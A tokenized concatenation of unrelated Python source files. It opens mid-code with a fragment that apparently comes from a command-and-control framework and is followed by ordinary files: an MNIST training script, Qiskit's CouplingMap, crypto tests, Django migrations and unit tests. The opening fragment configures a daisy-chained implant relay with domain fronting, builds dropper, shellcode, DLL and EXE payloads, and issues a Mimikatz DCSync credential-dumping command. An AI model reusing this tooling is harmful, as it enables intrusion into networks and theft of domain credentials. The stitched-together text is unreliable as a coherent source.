chain? Y/n? "+Colours.END)<line_sep>default_url=get_first_url(PayloadCommsHost DomainFrontHeader)<line_sep>default_df_header=get_first_dfheader(DomainFrontHeader)<if_stmt>default_df_header<eq>default_url<block_start>default_df_header=<none><block_end><if_stmt>firstdaisy.lower()<eq>"y"<or>firstdaisy<eq>""<block_start>upstream_url=input(Colours.GREEN+f"C2 URL (leave blank for {default_url}): "+Colours.END)<line_sep>domain_front=input(Colours.GREEN+f"Domain front header (leave blank for {str(default_df_header)}): "+Colours.END)<line_sep>proxy_user=input(Colours.GREEN+"Proxy user (<domain>\\<username>, leave blank if none): "+Colours.END)<line_sep>proxy_pass=input(Colours.GREEN+"Proxy password (leave blank if none): "+Colours.END)<line_sep>proxy_url=input(Colours.GREEN+"Proxy URL (leave blank if none): "+Colours.END)<line_sep>cred_expiry=input(Colours.GREEN+"Password/Account Expiration Date: .e.g. 15/03/2018: ")<if_stmt><not>upstream_url<block_start>upstream_url=default_url<block_end><if_stmt><not>domain_front<block_start><if_stmt>default_df_header<block_start>domain_front=default_df_header<block_end><else_stmt><block_start>domain_front=""<block_end><block_end><block_end><else_stmt><block_start>upstream_daisy_host=input(Colours.GREEN+"Upstream daisy server: "+Colours.END)<line_sep>upstream_daisy_port=input(Colours.GREEN+"Upstream daisy port: "+Colours.END)<line_sep>upstream_url=f"http://{upstream_daisy_host}:{upstream_daisy_port}"<line_sep>domain_front=upstream_daisy_host<block_end>urls=get_allurls().replace(" " "")<line_sep>useragent=UserAgent<line_sep>command=f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" {upstream_url} \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"<line_sep>new_task(command user randomuri)<line_sep>update_label("DaisyHost" randomuri)<line_sep>createpayloads=input(Colours.GREEN+"Would you like to create payloads for this Daisy Server? Y/n ")<if_stmt>createpayloads.lower()<eq>"y"<or>createpayloads<eq>""<block_start>name=input(Colours.GREEN+"Enter a payload name: "+Colours.END)<line_sep>daisyhost=get_implantdetails(randomuri)<line_sep>proxynone="if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"<line_sep>C2=get_c2server_all()<line_sep>urlId=new_urldetails(name f"\"http://{bind_ip}:{bind_port}\"" "\"\"" proxy_url proxy_user proxy_pass cred_expiry)<line_sep>newPayload=Payloads(C2.KillDate C2.EncKey C2.Insecure C2.UserAgent C2.Referrer "%s?d"%get_newimplanturl() PayloadsDirectory PowerShellProxyCommand=proxynone URLID=urlId)<line_sep>newPayload.PSDropper=(newPayload.PSDropper).replace("$pid;%s"%(upstream_url) "$pid;%s@%s"%(daisyhost.User daisyhost.Domain))<line_sep>newPayload.CreateDroppers(name)<line_sep>newPayload.CreateRaw(name)<line_sep>newPayload.CreateDlls(name)<line_sep>newPayload.CreateShellcode(name)<line_sep>newPayload.CreateDonutShellcode(name)<line_sep>newPayload.CreateEXE(name)<line_sep>newPayload.CreateMsbuild(name)<line_sep>print_good("Created new %s daisy payloads"%name)<block_end><block_end><def_stmt>do_dcsync user command randomuri<block_start>params=re.compile("dcsync " re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>res=params.split()<line_sep>domain=res[0]<line_sep>dcsync_user=res[1]<line_sep>new_task(f"run-dll SharpSploit.Credentials.Mimikatz SharpSploit Command \"\\\"lsadump::dcsync /domain:{domain} /user:{dcsync_user}\\\"\"" user randomuri)<block_end>
<import_from_future_stmt> print_function<import_stmt>argparse<import_stmt>gzip<import_stmt>json<import_stmt>logging<import_stmt>os<import_stmt>traceback<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow.keras Model<import_from_stmt>tensorflow.keras.layers Conv2D Dense Flatten<line_sep>logging.basicConfig(level=logging.DEBUG)<line_sep># Define the model object <class_stmt>SmallConv(Model)<block_start><def_stmt>__init__ self<block_start>super(SmallConv self).__init__()<line_sep>self.conv1=Conv2D(32 3 activation="relu")<line_sep>self.flatten=Flatten()<line_sep>self.d1=Dense(128 activation="relu")<line_sep>self.d2=Dense(10)<block_end><def_stmt>call self x<block_start>x=self.conv1(x)<line_sep>x=self.flatten(x)<line_sep>x=self.d1(x)<line_sep><return>self.d2(x)<block_end><block_end># Decode and preprocess data <def_stmt>convert_to_numpy data_dir images_file labels_file<block_start>"""Byte string to numpy arrays"""<with_stmt>gzip.open(os.path.join(data_dir images_file) "rb")<as>f<block_start>images=np.frombuffer(f.read() np.uint8 offset=16).reshape(-1 28 28)<block_end><with_stmt>gzip.open(os.path.join(data_dir labels_file) "rb")<as>f<block_start>labels=np.frombuffer(f.read() np.uint8 offset=8)<block_end><return>(images labels)<block_end><def_stmt>mnist_to_numpy data_dir train<block_start>"""Load raw MNIST data into numpy array Args: data_dir (str): directory of MNIST raw data. This argument can be accessed via SM_CHANNEL_TRAINING train (bool): use training data Returns: tuple of images and labels as numpy array """<if_stmt>train<block_start>images_file="train-images-idx3-ubyte.gz"<line_sep>labels_file="train-labels-idx1-ubyte.gz"<block_end><else_stmt><block_start>images_file="t10k-images-idx3-ubyte.gz"<line_sep>labels_file="t10k-labels-idx1-ubyte.gz"<block_end><return>convert_to_numpy(data_dir images_file labels_file)<block_end><def_stmt>normalize x axis<block_start>eps=np.finfo(float).eps<line_sep>mean=np.mean(x axis=axis keepdims=<true>)<line_sep># avoid division by zero std=np.std(x axis=axis keepdims=<true>)+eps<line_sep><return>(x-mean)/std<block_end># Training logic <def_stmt>train args# create data loader from the train / test channels <block_start>x_train,y_train=mnist_to_numpy(data_dir=args.train train=<true>)<line_sep>x_test,y_test=mnist_to_numpy(data_dir=args.test train=<false>)<line_sep>x_train,x_test=x_train.astype(np.float32) x_test.astype(np.float32)<line_sep># normalize the inputs to mean 0 and std 1 x_train,x_test=normalize(x_train (1 2)) normalize(x_test (1 2))<line_sep># expand channel axis # tf uses depth minor convention x_train,x_test=np.expand_dims(x_train axis=3) np.expand_dims(x_test axis=3)<line_sep># normalize the data to mean 0 and std 1 train_loader=(tf.data.Dataset.from_tensor_slices((x_train y_train)).shuffle(len(x_train)).batch(args.batch_size))<line_sep>test_loader=tf.data.Dataset.from_tensor_slices((x_test y_test)).batch(args.batch_size)<line_sep>model=SmallConv()<line_sep>model.compile()<line_sep>loss_fn=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=<true>)<line_sep>optimizer=tf.keras.optimizers.Adam(learning_rate=args.learning_rate beta_1=args.beta_1 beta_2=args.beta_2)<line_sep>train_loss=tf.keras.metrics.Mean(name="train_loss")<line_sep>train_accuracy=tf.keras.metrics.SparseCategoricalAccuracy(name="train_accuracy")<line_sep>test_loss=tf.keras.metrics.Mean(name="test_loss")<line_sep>test_accuracy=tf.keras.metrics.SparseCategoricalAccuracy(name="test_accuracy")<line_sep>@tf.function<def_stmt>train_step images labels<block_start><with_stmt>tf.GradientTape()<as>tape<block_start>predictions=model(images training=<true>)<line_sep>loss=loss_fn(labels predictions)<block_end>grad=tape.gradient(loss model.trainable_variables)<line_sep>optimizer.apply_gradients(zip(grad model.trainable_variables))<line_sep>train_loss(loss)<line_sep>train_accuracy(labels predictions)<line_sep><return><block_end>@tf.function<def_stmt>test_step images labels<block_start>predictions=model(images training=<false>)<line_sep>t_loss=loss_fn(labels predictions)<line_sep>test_loss(t_loss)<line_sep>test_accuracy(labels predictions)<line_sep><return><block_end>print("Training starts ...")<for_stmt>epoch range(args.epochs)<block_start>train_loss.reset_states()<line_sep>train_accuracy.reset_states()<line_sep>test_loss.reset_states()<line_sep>test_accuracy.reset_states()<for_stmt>batch,(images labels) enumerate(train_loader)<block_start>train_step(images labels)<block_end><for_stmt>images,labels test_loader<block_start>test_step(images labels)<block_end>print(f"Epoch {epoch+1}, "<concat>f"Loss: {train_loss.result()}, "<concat>f"Accuracy: {train_accuracy.result()<times>100}, "<concat>f"Test Loss: {test_loss.result()}, "<concat>f"Test Accuracy: {test_accuracy.result()<times>100}")<block_end># Save the model # A version number is needed for the serving container # to load the model version="00000000"<line_sep>ckpt_dir=os.path.join(args.model_dir version)<if_stmt><not>os.path.exists(ckpt_dir)<block_start>os.makedirs(ckpt_dir)<block_end>model.save(ckpt_dir)<line_sep><return><block_end><def_stmt>parse_args <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--batch-size" type=int default=32)<line_sep>parser.add_argument("--epochs" type=int default=1)<line_sep>parser.add_argument("--learning-rate" type=float default=1e-3)<line_sep>parser.add_argument("--beta_1" type=float default=0.9)<line_sep>parser.add_argument("--beta_2" type=float default=0.999)<line_sep># Environment variables given by the training image parser.add_argument("--model-dir" type=str default=os.environ["SM_MODEL_DIR"])<line_sep>parser.add_argument("--train" type=str default=os.environ["SM_CHANNEL_TRAINING"])<line_sep>parser.add_argument("--test" type=str default=os.environ["SM_CHANNEL_TESTING"])<line_sep>parser.add_argument("--current-host" type=str default=os.environ["SM_CURRENT_HOST"])<line_sep>parser.add_argument("--hosts" type=list default=json.loads(os.environ["SM_HOSTS"]))<line_sep><return>parser.parse_args()<block_end><if_stmt>__name__<eq>"__main__"<block_start>args=parse_args()<line_sep>train(args)<block_end>
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ Directed graph object for representing coupling between physical qubits. The nodes of the graph correspond to physical qubits (represented as integers) and the directed edges indicate which physical qubits are coupled and the permitted direction of CNOT gates. The object has a distance function that can be used to map quantum circuits onto a device with this coupling. """<import_stmt>io<import_stmt>warnings<import_stmt>numpy<as>np<import_stmt>retworkx<as>rx<import_from_stmt>qiskit.transpiler.exceptions CouplingError<import_from_stmt>qiskit.exceptions MissingOptionalLibraryError<class_stmt>CouplingMap<block_start>""" Directed graph specifying fixed coupling. Nodes correspond to physical qubits (integers) and directed edges correspond to permitted CNOT gates """<line_sep>__slots__=("description" "graph" "_dist_matrix" "_qubit_list" "_size" "_is_symmetric")<def_stmt>__init__ self couplinglist=<none> description=<none><block_start>""" Create coupling graph. By default, the generated coupling has no nodes. Args: couplinglist (list or None): An initial coupling graph, specified as an adjacency list containing couplings, e.g. [[0,1], [0,2], [1,2]]. It is required that nodes are contiguously indexed starting at 0. Missed nodes will be added as isolated nodes in the coupling map. description (str): A string to describe the coupling map. """<line_sep>self.description=description<line_sep># the coupling map graph self.graph=rx.PyDiGraph()<line_sep># a dict of dicts from node pairs to distances self._dist_matrix=<none><line_sep># a sorted list of physical qubits (integers) in this coupling map self._qubit_list=<none><line_sep># number of qubits in the graph self._size=<none><line_sep>self._is_symmetric=<none><if_stmt>couplinglist<is><not><none><block_start>self.graph.extend_from_edge_list([tuple(x)<for>x couplinglist])<block_end><block_end><def_stmt>size self<block_start>"""Return the number of physical qubits in this graph."""<if_stmt>self._size<is><none><block_start>self._size=len(self.graph)<block_end><return>self._size<block_end><def_stmt>get_edges self<block_start>""" Gets the list of edges in the coupling graph. Returns: Tuple(int,int): Each edge is a pair of physical qubits. """<line_sep><return>self.graph.edge_list()<block_end><def_stmt>add_physical_qubit self physical_qubit<block_start>"""Add a physical qubit to the coupling graph as a node. physical_qubit (int): An integer representing a physical qubit. Raises: CouplingError: if trying to add duplicate qubit """<if_stmt><not>isinstance(physical_qubit int)<block_start><raise>CouplingError("Physical qubits should be integers.")<block_end><if_stmt>physical_qubit<in>self.physical_qubits<block_start><raise>CouplingError("The physical qubit %s is already in the coupling graph"%physical_qubit)<block_end>self.graph.add_node(physical_qubit)<line_sep>self._dist_matrix=<none># invalidate self._qubit_list=<none># invalidate self._size=<none><block_end># invalidate <def_stmt>add_edge self src dst<block_start>""" Add directed edge to coupling graph. src (int): source physical qubit dst (int): destination physical qubit """<if_stmt>src<not><in>self.physical_qubits<block_start>self.add_physical_qubit(src)<block_end><if_stmt>dst<not><in>self.physical_qubits<block_start>self.add_physical_qubit(dst)<block_end>self.graph.add_edge(src dst <none>)<line_sep>self._dist_matrix=<none># invalidate self._is_symmetric=<none><block_end># invalidate <def_stmt>subgraph self nodelist<block_start>"""Return a CouplingMap object for a subgraph of self. nodelist (list): list of integer node labels """<line_sep>warnings.warn("The .subgraph() method is deprecated and will be removed in a "<concat>"future release. Instead the .reduce() method should be used "<concat>"instead which does the same thing but preserves nodelist order." DeprecationWarning stacklevel=2 )<line_sep>subcoupling=CouplingMap()<line_sep>subcoupling.graph=self.graph.subgraph(nodelist)<line_sep><return>subcoupling<block_end>@property<def_stmt>physical_qubits self<block_start>"""Returns a sorted list of physical_qubits"""<if_stmt>self._qubit_list<is><none><block_start>self._qubit_list=self.graph.node_indexes()<block_end><return>self._qubit_list<block_end><def_stmt>is_connected self<block_start>""" Test if the graph is connected. Return True if connected, False otherwise """<try_stmt><block_start><return>rx.is_weakly_connected(self.graph)<block_end><except_stmt>rx.NullGraph<block_start><return><false><block_end><block_end><def_stmt>neighbors self physical_qubit<block_start>"""Return the nearest neighbors of a physical qubit. Directionality matters, i.e. a neighbor must be reachable by going one hop in the direction of an edge. """<line_sep><return>self.graph.neighbors(physical_qubit)<block_end>@property<def_stmt>distance_matrix self<block_start>"""Return the distance matrix for the coupling map."""<line_sep>self.compute_distance_matrix()<line_sep><return>self._dist_matrix<block_end><def_stmt>compute_distance_matrix self<block_start>"""Compute the full distance matrix on pairs of nodes. The distance map self._dist_matrix is computed from the graph using all_pairs_shortest_path_length. This is normally handled internally by the :attr:`~qiskit.transpiler.CouplingMap.distance_matrix` attribute or the :meth:`~qiskit.transpiler.CouplingMap.distance` method but can be called if you're accessing the distance matrix outside of those or want to pre-generate it. """<if_stmt>self._dist_matrix<is><none><block_start><if_stmt><not>self.is_connected()<block_start><raise>CouplingError("coupling graph not connected")<block_end>self._dist_matrix=rx.digraph_distance_matrix(self.graph as_undirected=<true>)<block_end><block_end><def_stmt>distance self physical_qubit1 physical_qubit2<block_start>"""Returns the undirected distance between physical_qubit1 and physical_qubit2. Args: physical_qubit1 (int): A physical qubit physical_qubit2 (int): Another physical qubit Returns: int: The undirected distance Raises: CouplingError: if the qubits do not exist in the CouplingMap """<if_stmt>physical_qubit1<ge>self.size()<block_start><raise>CouplingError("%s not in coupling graph"%physical_qubit1)<block_end><if_stmt>physical_qubit2<ge>self.size()<block_start><raise>CouplingError("%s not in coupling graph"%physical_qubit2)<block_end>self.compute_distance_matrix()<line_sep><return>int(self._dist_matrix[physical_qubit1 physical_qubit2])<block_end><def_stmt>shortest_undirected_path self physical_qubit1 physical_qubit2<block_start>"""Returns the shortest undirected path between physical_qubit1 and physical_qubit2. Args: physical_qubit1 (int): A physical qubit physical_qubit2 (int): Another physical qubit Returns: List: The shortest undirected path Raises: CouplingError: When there is no path between physical_qubit1, physical_qubit2. """<line_sep>paths=rx.digraph_dijkstra_shortest_paths(self.graph source=physical_qubit1 target=physical_qubit2 as_undirected=<true>)<if_stmt><not>paths<block_start><raise>CouplingError(f"Nodes {str(physical_qubit1)} and {str(physical_qubit2)} are not connected")<block_end><return>paths[physical_qubit2]<block_end>@property<def_stmt>is_symmetric self<block_start>""" Test if the graph is symmetric. Return True if symmetric, False otherwise """<if_stmt>self._is_symmetric<is><none><block_start>self._is_symmetric=self._check_symmetry()<block_end><return>self._is_symmetric<block_end><def_stmt>make_symmetric self<block_start>""" Convert uni-directional edges into bi-directional. """<line_sep>edges=self.get_edges()<for_stmt>src,dest edges<block_start><if_stmt>(dest src)<not><in>edges<block_start>self.add_edge(dest src)<block_end><block_end>self._dist_matrix=<none># invalidate self._is_symmetric=<none><block_end># invalidate <def_stmt>_check_symmetry self<block_start>""" Calculates symmetry Returns: Bool: True if symmetric, False otherwise """<line_sep><return>self.graph.is_symmetric()<block_end><def_stmt>reduce self mapping<block_start>"""Returns a reduced coupling map that corresponds to the subgraph of qubits selected in the mapping. Args: mapping (list): A mapping of reduced qubits to device qubits. Returns: CouplingMap: A reduced coupling_map for the selected qubits. Raises: CouplingError: Reduced coupling map must be connected. """<import_from_stmt>scipy.sparse coo_matrix csgraph<line_sep>reduced_qubits=len(mapping)<line_sep>inv_map=[<none>]<times>(max(mapping)+1)<for_stmt>idx,val enumerate(mapping)<block_start>inv_map[val]=idx<block_end>reduced_cmap=[]<for_stmt>edge self.get_edges()<block_start><if_stmt>edge[0]<in>mapping<and>edge[1]<in>mapping<block_start>reduced_cmap.append([inv_map[edge[0]] inv_map[edge[1]]])<block_end><block_end># Verify coupling_map is connected rows=np.array([edge[0]<for>edge reduced_cmap] dtype=int)<line_sep>cols=np.array([edge[1]<for>edge reduced_cmap] dtype=int)<line_sep>data=np.ones_like(rows)<line_sep>mat=coo_matrix((data (rows cols)) shape=(reduced_qubits reduced_qubits)).tocsr()<if_stmt>csgraph.connected_components(mat)[0]<ne>1<block_start><raise>CouplingError("coupling_map must be connected.")<block_end><return>CouplingMap(reduced_cmap)<block_end>@classmethod<def_stmt>from_full cls num_qubits bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a fully connected coupling map on n qubits."""<line_sep>cmap=cls(description="full")<if_stmt>bidirectional<block_start>cmap.graph=rx.generators.directed_mesh_graph(num_qubits)<block_end><else_stmt><block_start>edge_list=[]<for_stmt>i range(num_qubits)<block_start><for_stmt>j range(i)<block_start>edge_list.append((j i))<block_end><block_end>cmap.graph.extend_from_edge_list(edge_list)<block_end><return>cmap<block_end>@classmethod<def_stmt>from_line cls num_qubits bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a coupling map of n qubits connected in a line."""<line_sep>cmap=cls(description="line")<line_sep>cmap.graph=rx.generators.directed_path_graph(num_qubits bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_ring cls num_qubits bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a coupling map of n qubits connected to each of their neighbors in a ring."""<line_sep>cmap=cls(description="ring")<line_sep>cmap.graph=rx.generators.directed_cycle_graph(num_qubits bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_grid cls num_rows num_columns bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a coupling map of qubits connected on a grid of num_rows x num_columns."""<line_sep>cmap=cls(description="grid")<line_sep>cmap.graph=rx.generators.directed_grid_graph(num_rows num_columns bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_heavy_hex cls distance bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a heavy hexagon graph coupling map. A heavy hexagon graph is described in: https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022 Args: distance (int): The code distance for the generated heavy hex graph. The value for distance can be any odd positive integer. The distance relates to the number of qubits by: :math:`n = \\frac{5d^2 - 2d - 1}{2}` where :math:`n` is the number of qubits and :math:`d` is the ``distance`` parameter. bidirectional (bool): Whether the edges in the output coupling graph are bidirectional or not. By default this is set to ``True`` Returns: CouplingMap: A heavy hex coupling graph """<line_sep>cmap=cls(description="heavy-hex")<line_sep>cmap.graph=rx.generators.directed_heavy_hex_graph(distance bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_heavy_square cls distance bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a heavy square graph coupling map. A heavy square graph is described in: https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022 Args: distance (int): The code distance for the generated heavy square graph. The value for distance can be any odd positive integer. The distance relates to the number of qubits by: :math:`n = 3d^2 - 2d` where :math:`n` is the number of qubits and :math:`d` is the ``distance`` parameter. bidirectional (bool): Whether the edges in the output coupling graph are bidirectional or not. By default this is set to ``True`` Returns: CouplingMap: A heavy square coupling graph """<line_sep>cmap=cls(description="heavy-square")<line_sep>cmap.graph=rx.generators.directed_heavy_square_graph(distance bidirectional=bidirectional)<line_sep><return>cmap<block_end>@classmethod<def_stmt>from_hexagonal_lattice cls rows cols bidirectional=<true><arrow>"CouplingMap"<block_start>"""Return a hexagonal lattice graph coupling map. Args: rows (int): The number of rows to generate the graph with. cols (int): The number of columns to generate the graph with. bidirectional (bool): Whether the edges in the output coupling graph are bidirectional or not. By default this is set to ``True`` Returns: CouplingMap: A hexagonal lattice coupling graph """<line_sep>cmap=cls(description="hexagonal-lattice")<line_sep>cmap.graph=rx.generators.directed_hexagonal_lattice_graph(rows cols bidirectional=bidirectional)<line_sep><return>cmap<block_end><def_stmt>largest_connected_component self<block_start>"""Return a set of qubits in the largest connected component."""<line_sep><return>max(rx.weakly_connected_components(self.graph) key=len)<block_end><def_stmt>__str__ self<block_start>"""Return a string representation of the coupling graph."""<line_sep>string=""<if_stmt>self.get_edges()<block_start>string<augadd>"["<line_sep>string<augadd>", ".join([f"[{src}, {dst}]"<for>(src dst) self.get_edges()])<line_sep>string<augadd>"]"<block_end><return>string<block_end><def_stmt>draw self<block_start>"""Draws the coupling map. This function needs `pydot <https://github.com/erocarrera/pydot>`_, which in turn needs `Graphviz <https://www.graphviz.org/>`_ to be installed. Additionally, `pillow <https://python-pillow.org/>`_ will need to be installed. Returns: PIL.Image: Drawn coupling map. Raises: MissingOptionalLibraryError: when pydot or pillow are not installed. """<try_stmt><block_start><import_stmt>pydot<block_end><except_stmt>ImportError<as>ex<block_start><raise>MissingOptionalLibraryError(libname="pydot" name="coupling map drawer" pip_install="pip install pydot" )<from>ex<block_end><try_stmt><block_start><import_from_stmt>PIL Image<block_end><except_stmt>ImportError<as>ex<block_start><raise>MissingOptionalLibraryError(libname="pillow" name="coupling map drawer" pip_install="pip install pillow" )<from>ex<block_end>dot_str=self.graph.to_dot()<line_sep>dot=pydot.graph_from_dot_data(dot_str)[0]<line_sep>png=dot.create_png(prog="neato")<line_sep><return>Image.open(io.BytesIO(png))<block_end><block_end>
<import_stmt>json<import_stmt>pytest<import_from_stmt>indy crypto error<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_pack_message_and_unpack_message_authcrypt_works wallet_handle identity_my1 identity_steward1 pack_message# setup keys <block_start>_,sender_vk=identity_my1<line_sep>_,steward_vk=identity_steward1<line_sep>recipient_verkeys=[steward_vk]<line_sep># run pack and unpack packed_message=<await>crypto.pack_message(wallet_handle pack_message recipient_verkeys sender_vk)<line_sep>unpacked_message=<await>crypto.unpack_message(wallet_handle packed_message)<line_sep># test function unpacked_message_json=json.loads(unpacked_message.decode("utf-8"))<assert_stmt>unpacked_message_json['message']<eq>pack_message<assert_stmt>unpacked_message_json['recipient_verkey']<eq>steward_vk<assert_stmt>unpacked_message_json['sender_verkey']<eq>sender_vk<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_pack_message_and_unpack_message_anoncrypt_works wallet_handle identity_steward1 pack_message# setup keys <block_start>_,steward_vk=identity_steward1<line_sep>recipient_verkeys=[steward_vk]<line_sep># run pack and unpack packed_message=<await>crypto.pack_message(wallet_handle pack_message recipient_verkeys <none>)<line_sep>unpacked_message=<await>crypto.unpack_message(wallet_handle packed_message)<line_sep># test function unpacked_message_json=json.loads(unpacked_message.decode("utf-8"))<assert_stmt>unpacked_message_json['message']<eq>pack_message<assert_stmt>unpacked_message_json['recipient_verkey']<eq>steward_vk<assert_stmt>'sender_verkey'<not><in>unpacked_message_json<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_pack_message_and_unpack_message_missing_verkey wallet_handle identity_my1 verkey_my2 pack_message# setup keys <block_start>_,sender_vk=identity_my1<line_sep>recipient_verkeys=[verkey_my2]<line_sep># run pack and unpack packed_message=<await>crypto.pack_message(wallet_handle pack_message recipient_verkeys sender_vk)<with_stmt>pytest.raises(error.WalletItemNotFound)<block_start><await>crypto.unpack_message(wallet_handle packed_message)<block_end><block_end>
# -*- coding: utf-8 -*- # Generated by Django 1.9.5 on 2016-04-14 21:18 <import_from_future_stmt> unicode_literals<import_stmt>django.utils.timezone<import_from_stmt>django.db migrations<import_from_stmt>django.db models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('orchestra' '0036_remove_taskassignment_snapshots') ]<line_sep>operations=[migrations.AddField(model_name='iteration' name='created_at' field=models.DateTimeField(default=django.utils.timezone.now) ) migrations.AddField(model_name='iteration' name='is_deleted' field=models.BooleanField(default=<false>) ) ]<block_end>
# -*- coding: utf-8 -*- u"""Utils module for SecureTea Social Engineering. Project: ╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐ ╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤ ╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴ Author: <NAME> <<EMAIL>> , Aug 6 2020 Version: 2.1 Module: SecureTea """<import_stmt>re<def_stmt>check_valid_email email<block_start>""" Check whether the email string is valid or not Args: email : email id Raises: None Returns: bool: True if valid, else False """<line_sep>regex_std_mails="^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$"<line_sep>regex_custom_mails="^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$"<line_sep><return>re.search(regex_std_mails email)<or>re.search(regex_custom_mails email)<block_end>
# Generated by Django 3.1.3 on 2020-11-29 09:12 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("autotasks" "0008_auto_20201030_1515") ]<line_sep>operations=[migrations.AddField(model_name="automatedtask" name="run_time_bit_weekdays" field=models.IntegerField(blank=<true> null=<true>) ) ]<block_end>
<import_from_stmt>typing List NewType Optional Tuple Union<line_sep>__all__=["Data" "Origin" "ExtensionHeader" "ExtensionParameter" "Subprotocol"]<line_sep>Data=Union[str bytes]<line_sep>Data__doc__=""" Types supported in a WebSocket message: - :class:`str` for text messages - :class:`bytes` for binary messages """<line_sep># Remove try / except when dropping support for Python < 3.7 <try_stmt><block_start>Data.__doc__=Data__doc__# type: ignore <block_end><except_stmt>AttributeError# pragma: no cover <block_start><pass><block_end>Origin=NewType("Origin" str)<line_sep>Origin.__doc__="""Value of a Origin header"""<line_sep>ExtensionName=NewType("ExtensionName" str)<line_sep>ExtensionName.__doc__="""Name of a WebSocket extension"""<line_sep>ExtensionParameter=Tuple[str Optional[str]]<line_sep>ExtensionParameter__doc__="""Parameter of a WebSocket extension"""<try_stmt><block_start>ExtensionParameter.__doc__=ExtensionParameter__doc__# type: ignore <block_end><except_stmt>AttributeError# pragma: no cover <block_start><pass><block_end>ExtensionHeader=Tuple[ExtensionName List[ExtensionParameter]]<line_sep>ExtensionHeader__doc__="""Item parsed in a Sec-WebSocket-Extensions header"""<try_stmt><block_start>ExtensionHeader.__doc__=ExtensionHeader__doc__# type: ignore <block_end><except_stmt>AttributeError# pragma: no cover <block_start><pass><block_end>Subprotocol=NewType("Subprotocol" str)<line_sep>Subprotocol.__doc__="""Items parsed in a Sec-WebSocket-Protocol header"""<line_sep>
<import_stmt>unittest<import_from_stmt>rising AbstractMixin<class_stmt>Abstract(object)<block_start><def_stmt>__init__ self **kwargs<block_start>super().__init__()<line_sep>self.abstract=<true><block_end><block_end><class_stmt>AbstractForward(object)<block_start><def_stmt>__init__ self **kwargs<block_start>super().__init__(**kwargs)<line_sep>self.abstract=<true><block_end><block_end><class_stmt>PreMix(AbstractMixin Abstract)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end><class_stmt>PostMix(AbstractForward AbstractMixin)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end><class_stmt>MyTestCase(unittest.TestCase)<block_start><def_stmt>test_pre_mix self<block_start>obj=PreMix(a=<true>)<line_sep>self.assertFalse(hasattr(obj "a"))<line_sep>self.assertTrue(obj.abstract)<block_end><def_stmt>test_post_mix self<block_start>obj=PostMix(a=<true>)<line_sep>self.assertTrue(obj.a)<line_sep>self.assertTrue(obj.abstract)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
<import_stmt>os<import_stmt>unittest<import_from_stmt>PIL Image<import_from_stmt>utils getdrawer abspath<import_from_stmt>helper assert_image_similar<class_stmt>TestRankingScreen(unittest.TestCase)<block_start>@classmethod<def_stmt>setUpClass cls<block_start>cls.tests=[]<line_sep>cls.update=<false><line_sep>cls.tests.append(getdrawer("" "syunn" (123123123 -1)))<line_sep>cls.tests.append(getdrawer("2" "syunn" (123123123 -1)))<block_end><def_stmt>testframes self<block_start><for_stmt>i range(len(self.tests))<block_start>drawer=self.tests[i][1]<line_sep>expectf=self.tests[i][0]+"rankingbruh.png"<for_stmt>x range(int(0.5<times>drawer.settings.fps))<block_start>drawer.draw_rankingpanel()<block_end><if_stmt>self.update<block_start>drawer.pbuffer.save(expectf)<block_end><else_stmt><block_start>expect=Image.open(expectf).convert("RGBA")<line_sep>assert_image_similar(drawer.pbuffer expect 5)<block_end>expectf=self.tests[i][0]+"rankingbruh1.png"<for_stmt>x range(int(0.6<times>drawer.settings.fps))<block_start>drawer.draw_rankingpanel()<block_end><if_stmt>self.update<block_start>drawer.pbuffer.save(expectf)<block_end><else_stmt><block_start>expect=Image.open(expectf).convert("RGBA")<line_sep>assert_image_similar(drawer.pbuffer expect 1)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
